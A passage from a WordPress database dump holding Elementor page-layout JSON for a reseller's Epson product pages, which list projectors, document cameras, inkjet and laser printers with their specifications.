20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7909,3473,'_elementor_version','2.5.14'),(7912,3474,'_wp_page_template','template-fullwidth.php'),(7913,3474,'_elementor_edit_mode','builder'),(7914,3474,'_elementor_template_type','post'),(7915,3474,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2424 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><br>\\n\\nThe Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Speed: Up to 30ppm<\\/li>\\n \\t<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li>\\n \\t<li>Quality prints with new Epson Technologies<\\/li>\\n \\t<li>New print job management features<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><br><br>\\n<img class=\\\"wp-image-2426 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><br>\\n\\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\\n<ul>\\n \\t<li>1200 x 1200 dpi<\\/li>\\n \\t<li>Print speed up to 35ppm<\\/li>\\n \\t<li>Auto-Duplex<\\/li>\\n \\t<li>Ethernet &amp; Epson iPrint<\\/li>\\n \\t<li>2 optional paper cassette tray<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Epson WorkForce 